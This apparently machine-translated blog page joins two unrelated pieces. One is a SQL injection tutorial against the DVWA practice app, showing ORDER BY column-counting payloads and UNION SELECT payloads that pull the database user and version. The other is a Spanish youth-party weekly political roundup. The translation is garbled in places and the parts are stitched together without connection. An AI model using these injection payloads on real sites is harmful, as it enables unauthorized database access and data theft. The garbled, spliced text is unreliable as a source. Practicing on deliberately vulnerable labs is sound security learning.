recalculated the middle element: (10 +15) / 2 = 12 (integer quotient)  CONSULTA RESPONSE DEDUCCIÓN select 1,2,3,4,5,6,7,8, BY ORDER 9,10,11 12; ERROR There are fewer than 12. Upper limit = 12 |
| Middle element: (10 +12) / 2 = 11 |
Practice ORDER BY in DVWA
Now let's do the DVWA. The injection technique using the incremental system, would be: ANSWER INJECTION
'order by 1 # nothing happens
' order by 2 # nothing happens 'order by 3 # Unknown column '3' in 'order clause '
Fig. 6 - Injection ORDER BY.
Note that place the # character at the end to comment on the quote that follows. The final consultation with this shot would look like:
SELECT first_name, last_name FROM users WHERE user_id =''ORDER BY 3 # ';
I leave the practice of binary search deduction for you.
6.2 Data Extraction with UNION SELECT
Well, we know how many fields are being selected in the query. Now what follows is to know which of these fields are displayed to the user on the web. Not all selected fields are inserted into Web page response, some are only used internally by the application. Knowing which fields are visible will help us get through them the information they want from the database.
If the application does not display any field in the response we face a case of Blind SQL Injection
or blind SQL injection. For such cases there are other techniques that can be used but these will explain them later. For now we are only interested to learn how to operate an ordinary SQLi.
To find out which fields are displayed on the website will use the UNION clause . This clause tells MySQL that should unite the answer preceding query with UNION query results that follows. However, to make this possible is a prerequisite that both queries have the same number of fields. If not, fail. It was therefore necessary to first learn to deduce the number of fields;) For example:
SELECT first_name, last_name FROM users WHERE user_id = '1 'UNION SELECT first_name, last_name FROM users WHERE user_id = '2';
Then we can build injections UNION SELECT
to make our own queries to the database and extract the information you want. 6.2.1
data mining practice in DVWA
'AND 1 = 0 UNION SELECT 1.2 #
Fig. 8 - Bombay UNION SELECT fields visible.
The consultation will come to the database would look like: SELECT first_name, last_name FROM users WHERE user_id =''AND 1 = 0 UNION SELECT 1.2 # ';
As
you can see I added a
AND 1 = 0 UNION before"First Name" and
. This is to reverse the previous query and only showing the results of our consultation injected.
As a result of our injection you select the numbers 1 and 2 we can see in the answer page in the area corresponding to
Now that we know which fields 1 and 2 are visible use to get some information:  | 'AND 1 = 0 UNION SELECT user (), version () #
 Fig. 9 - User and version of the database. |
return the user to the database and MySQL respectively. Another interesting feature is
database ()
that returns the name of the database.
Well here we have learned how data mining works with UNION SELECT. In the next chapter in the series (I have no idea when it will xD) delve a little deeper into the data extraction.
A greeting and goodbye.
Best Rapping Microphone
3. Pheasant
Another week ends. Domestically, NNGG Linear City has continued its recruitment campaign for the district by publicizing the party proposals on the street, picking up our efforts wide acceptance among neighborhood residents. In addition, we were also present at the event ten years with no military service in Torrejón and the CAPE NNGG Moncloa, where dozens of young people spent a great Saturday in a rural environment and enviable camaraderie.
national scene in the week has been marked by two bombings. First, the fact that Zapatero finally throws in the towel and goes after the years of depression and comparison to that submitted for our poor Spain. Hopefully the next leader socialist follow the footsteps of his predecessor and never come to refer to the Kingdom to the economic and institutional crisis that is stuck. On the other hand, each day this week have emerged more information about Case Pheasant (to know more read the article in this blog "Hot Pheasant).
On the international scene do not appear to have been significant changes. The Arab world is so troubled and unstable as ever. In Egypt the rumors do nothing but succeed while the allies have succeeded in giving wings to the Libyan rebels. But they are not getting to meet their full objectives and it seems that the week ends with a tie resulting in Libya divided into two ... perhaps the operation should be carried one step further and end up giving the Gadhafi lace, just a few years ago was done with Saddam. On the other hand, the deplorable level is reaching the English action in the matter, showing all the international clout that we have lost a case to case. With regard to another hot topic, Japan, observe how gradually regains the tranquility, watching possibly the greatest consequence of the "Fukushima Accident" is to be especially security measures, something always good. A note apart from that the upsurge in violence in Afghanistan and Pakistan, along with the struggle for the presidency in Ivory Coast.
Little more to say. We can only say goodbye and wish good luck for the upcoming week.
Subscribe to:
Comments (Atom)